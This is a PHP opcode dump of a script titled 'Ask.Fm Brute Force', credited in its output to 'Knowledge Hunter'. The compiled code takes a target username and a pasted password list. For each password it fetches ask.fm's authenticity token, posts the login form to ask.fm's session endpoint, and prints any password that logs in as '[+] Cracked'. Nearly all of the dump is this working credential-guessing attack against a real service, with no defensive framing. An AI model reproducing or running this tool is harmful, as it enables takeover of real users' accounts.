Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 77) Position 1 = 23, Position 2 = 51 Branch analysis from position: 23 2 jumps found. (Code = 78) Position 1 = 24, Position 2 = 51 Branch analysis from position: 24 2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 50 Branch analysis from position: 39 1 jumps found. (Code = 42) Position 1 = 51 Branch analysis from position: 51 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 50 1 jumps found. (Code = 42) Position 1 = 23 Branch analysis from position: 23 Branch analysis from position: 51 Branch analysis from position: 51 filename: /in/1DrIH function name: (null) number of ops: 64 compiled vars: !0 = $site, !1 = $username, !2 = $passl, !3 = $pass, !4 = $hash, !5 = $x line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 6 0 E > ECHO '%3Cform+method%3D%27POST%27%3E%3Ctitle%3EAsk.Fm+Brute+Force%3C%2Ftitle%3E%3Ccenter%3E%0A++++++++%3Cfont+face%3D%27Tahoma%27+size%3D%275%27+color%3D%27darkred%27%3E%3Cb%3EAsk.Fm%3C%2Fb%3E%3C%2Ffont%3E%3Cfont+face%3D%27Tahoma%27+size%3D%272%27%3E%3Cb%3E+Brute+Force%3C%2Fb%3E%3Cbr%3E%0A++++++++%3Cinput+name%3D%27username%27+placeholder%3D%27username%27%3E%3Cbr%3E%0A++++++++%3Ctextarea+cols%3D%2720%27+rows%3D%2715%27+name%3D%27pass%27%3E%3C%2Ftextarea%3E%3Cbr%3E%0A++++++++%3Cinput+type%3D%27submit%27+value%3D%27Brute%27+%2F%3E%3Cbr%3E%3C%2Fform%3E' 11 1 BEGIN_SILENCE ~6 2 INIT_FCALL 'set_time_limit' 3 SEND_VAL 0 4 DO_ICALL 5 END_SILENCE ~6 12 6 BEGIN_SILENCE ~8 7 INIT_FCALL 'error_reporting' 8 SEND_VAL 0 9 DO_ICALL 10 END_SILENCE ~8 13 11 ASSIGN !0, 'http%3A%2F%2Fask.fm%2Flogin%2F' 14 12 FETCH_R global ~11 '_POST' 13 FETCH_DIM_R ~12 ~11, 'username' 14 ASSIGN !1, ~12 15 15 INIT_FCALL 'explode' 16 SEND_VAL '%0D%0A' 17 FETCH_R global ~14 '_POST' 18 FETCH_DIM_R ~15 ~14, 'pass' 19 SEND_VAL ~15 20 DO_ICALL $16 21 ASSIGN !2, $16 16 22 > FE_RESET_R $18 !2, ->51 23 > > FE_FETCH_R $18, !3, ->51 18 24 > INIT_FCALL_BY_NAME 'token' 25 SEND_VAR_EX !0 26 DO_FCALL 0 $19 27 ASSIGN !4, $19 19 28 INIT_FCALL_BY_NAME 'brute' 29 SEND_VAR_EX !4 30 SEND_VAR_EX !1 31 SEND_VAR_EX !3 32 DO_FCALL 0 $21 33 ASSIGN !5, $21 20 34 INIT_FCALL 'preg_match' 35 SEND_VAL '%2F%3Ca+href%3D%22%28.%2A%3F%29%22+class%3D%22link-menu%22+data-rlt-aid%3D%22tlb_menu_answers%22%3EProfile%2F' 36 SEND_VAR !5 37 DO_ICALL $23 38 > JMPZ $23, ->50 23 39 > ROPE_INIT 5 ~25 '%3Cbr%3E%5B%2B%5D+Cracked+%3A+%3Cfont+face%3D%27Tahoma%27+size%3D%272%27+color%3D%27red%27%3E%3Cb%3E' 40 ROPE_ADD 1 ~25 ~25, !1 41 ROPE_ADD 2 ~25 ~25, '%3C%2Fb%3E%3C%2Ffont%3E+%2F+%3Cfont+face%3D%27Tahoma%27+size%3D%272%27+color%3D%27red%27%3E%3Cb%3E' 42 ROPE_ADD 3 ~25 ~25, !3 43 ROPE_END 4 ~24 ~25, '%3C%2Fb%3E%3C%2Ffont%3E' 44 ECHO ~24 24 45 INIT_FCALL 'flush' 46 DO_ICALL 47 INIT_FCALL 'flush' 48 DO_ICALL 25 49 > JMP ->51 16 50 > > JMP ->23 51 > FE_FREE $18 55 52 BEGIN_SILENCE ~30 53 INIT_FCALL 'system' 54 SEND_VAL 'del+cookie.txt' 55 DO_ICALL 56 END_SILENCE ~30 56 57 BEGIN_SILENCE ~32 58 INIT_FCALL 'system' 59 SEND_VAL 'rm+cookie.txt' 60 DO_ICALL 61 END_SILENCE ~32 57 62 ECHO '%3Cbr%3E%3Cbr%3E%3Cfont+face%3D%27Tahoma%27+size%3D%272%27%3E%5B%2B%5D+Coded+By+%3A+Knowledge+Hunter+%7C+Homepage%3A+knowledge-h.blogspot.com+%3Cbr%3E+Greet%27z+%3A+GRENXPARTa+-+Mr+K+-+Ice-cream%3C%2Ffont%3E' 58 63 > RETURN 1 Function token: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/1DrIH function name: token number of ops: 52 compiled vars: !0 = $site, !1 = $curl, !2 = $b0x, !3 = $token line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 29 0 E > RECV !0 31 1 INIT_FCALL_BY_NAME 'curl_init' 2 DO_FCALL 0 $4 3 ASSIGN !1, $4 32 4 INIT_FCALL_BY_NAME 'curl_setopt' 5 SEND_VAR_EX !1 6 FETCH_CONSTANT ~6 'CURLOPT_RETURNTRANSFER' 7 SEND_VAL_EX ~6 8 SEND_VAL_EX 1 9 DO_FCALL 0 33 10 INIT_FCALL_BY_NAME 'curl_setopt' 11 SEND_VAR_EX !1 12 FETCH_CONSTANT ~8 'CURLOPT_FOLLOWLOCATION' 13 SEND_VAL_EX ~8 14 SEND_VAL_EX 1 15 DO_FCALL 0 34 16 INIT_FCALL_BY_NAME 'curl_setopt' 17 SEND_VAR_EX !1 18 FETCH_CONSTANT ~10 'CURLOPT_URL' 19 SEND_VAL_EX ~10 20 SEND_VAR_EX !0 21 DO_FCALL 0 35 22 INIT_FCALL_BY_NAME 'curl_setopt' 23 SEND_VAR_EX !1 24 FETCH_CONSTANT ~12 'CURLOPT_COOKIEJAR' 25 SEND_VAL_EX ~12 26 INIT_FCALL 'getcwd' 27 DO_ICALL $13 28 CONCAT ~14 $13, '.%2Fcookie.txt' 29 SEND_VAL_EX ~14 30 DO_FCALL 0 36 31 INIT_FCALL_BY_NAME 'curl_setopt' 32 SEND_VAR_EX !1 33 FETCH_CONSTANT ~16 'CURLOPT_COOKIEFILE' 34 SEND_VAL_EX ~16 35 INIT_FCALL 'getcwd' 36 DO_ICALL $17 37 CONCAT ~18 $17, '.%2Fcookie.txt' 38 SEND_VAL_EX ~18 39 DO_FCALL 0 37 40 INIT_FCALL_BY_NAME 'curl_exec' 41 SEND_VAR_EX !1 42 DO_FCALL 0 $20 43 ASSIGN !2, $20 38 44 INIT_FCALL 'preg_match' 45 SEND_VAL '%2F%3Cinput+name%3D%22authenticity_token%22+type%3D%22hidden%22+value%3D%22%28.%2A%3F%29%22+%2F' 46 SEND_VAR !2 47 SEND_REF !3 48 DO_ICALL 39 49 FETCH_DIM_R ~23 !3, 1 50 > RETURN ~23 40 51* > RETURN null End of function token Function brute: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/1DrIH function name: brute number of ops: 61 compiled vars: !0 = $hash, !1 = $username, !2 = $pass, !3 = $curl, !4 = $brute line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 43 0 E > RECV !0 1 RECV !1 2 RECV !2 45 3 INIT_FCALL_BY_NAME 'curl_init' 4 DO_FCALL 0 $5 5 ASSIGN !3, $5 46 6 INIT_FCALL_BY_NAME 'curl_setopt' 7 SEND_VAR_EX !3 8 FETCH_CONSTANT ~7 'CURLOPT_RETURNTRANSFER' 9 SEND_VAL_EX ~7 10 SEND_VAL_EX 1 11 DO_FCALL 0 47 12 INIT_FCALL_BY_NAME 'curl_setopt' 13 SEND_VAR_EX !3 14 FETCH_CONSTANT ~9 'CURLOPT_FOLLOWLOCATION' 15 SEND_VAL_EX ~9 16 SEND_VAL_EX 1 17 DO_FCALL 0 48 18 INIT_FCALL_BY_NAME 'curl_setopt' 19 SEND_VAR_EX !3 20 FETCH_CONSTANT ~11 'CURLOPT_URL' 21 SEND_VAL_EX ~11 22 SEND_VAL_EX 'http%3A%2F%2Fask.fm%2Fsession' 23 DO_FCALL 0 49 24 INIT_FCALL_BY_NAME 'curl_setopt' 25 SEND_VAR_EX !3 26 FETCH_CONSTANT ~13 'CURLOPT_POSTFIELDS' 27 SEND_VAL_EX ~13 28 ROPE_INIT 7 ~15 'authenticity_token%3D' 29 ROPE_ADD 1 ~15 ~15, !0 30 ROPE_ADD 2 ~15 ~15, '%26login%3D' 31 ROPE_ADD 3 ~15 ~15, !1 32 ROPE_ADD 4 ~15 ~15, '%26password%3D' 33 ROPE_ADD 5 ~15 ~15, !2 34 ROPE_END 6 ~14 ~15, '%26commit%3DLog%2Bin' 35 SEND_VAL_EX ~14 36 DO_FCALL 0 50 37 INIT_FCALL_BY_NAME 'curl_setopt' 38 SEND_VAR_EX !3 39 FETCH_CONSTANT ~20 'CURLOPT_COOKIEJAR' 40 SEND_VAL_EX ~20 41 INIT_FCALL 'getcwd' 42 DO_ICALL $21 43 CONCAT ~22 $21, '.%2Fcookie.txt' 44 SEND_VAL_EX ~22 45 DO_FCALL 0 51 46 INIT_FCALL_BY_NAME 'curl_setopt' 47 SEND_VAR_EX !3 48 FETCH_CONSTANT ~24 'CURLOPT_COOKIEFILE' 49 SEND_VAL_EX ~24 50 INIT_FCALL 'getcwd' 51 DO_ICALL $25 52 CONCAT ~26 $25, '.%2Fcookie.txt' 53 SEND_VAL_EX ~26 54 DO_FCALL 0 52 55 INIT_FCALL_BY_NAME 'curl_exec' 56 SEND_VAR_EX !3 57 DO_FCALL 0 $28 58 ASSIGN !4, $28 53 59 > RETURN !4 54 60* > RETURN null End of function brute
Generated using Vulcan Logic Dumper, using php 8.0.0